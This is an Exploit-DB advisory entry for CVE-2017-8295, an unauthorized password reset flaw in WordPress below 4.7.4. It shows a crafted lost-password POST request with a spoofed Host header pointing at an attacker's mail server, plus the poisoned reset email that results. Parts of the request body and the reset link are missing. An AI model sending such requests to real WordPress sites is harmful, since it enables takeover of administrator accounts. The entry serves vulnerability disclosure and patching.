WordPress < 4.7.4 - Unauthorized Password Reset

EDB-ID: 41963
Author: Dawid Golunski
Published: 2017-05-03
CVE: CVE-2017-8295
Type: Webapps
Platform: Linux
Aliases: N/A
Tags: N/A
Vulnerable App: Download Vulnerable Application

 - Discovered by: Dawid Golunski 
- dawid[at]legalhackers.com
- https://legalhackers.com

- CVE-2017-8295
- Release date: 03.05.2017
- Revision 1.0
- Severity: Medium/High

Source: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

If an attacker sends a request similar to the one below to a default Wordpress
installation that is accessible by the IP address (IP-based vhost):

-----[ HTTP Request ]----

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56



Wordpress will trigger the password reset function for the admin user account.

Because of the modified HOST header, the SERVER_NAME will be set to
the hostname of attacker's choice.
As a result, Wordpress will pass the following headers and email body to the
/usr/bin/sendmail wrapper:

------[ resulting e-mail ]-----

Subject: [CompanyX WP] Password Reset
Return-Path: <[email protected]>
From: WordPress <[email protected]>
Message-ID: <[email protected]>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Someone requested that the password be reset for the following account:


Username: admin

If this was a mistake, just ignore this email and nothing will happen.

To reset your password, visit the following address:



As we can see, fields Return-Path, From, and Message-ID, all have the attacker's
domain set.

The verification of the headers can be performed by replacing /usr/sbin/sendmail with a
bash script of:

cat > /tmp/outgoing-email

Related Posts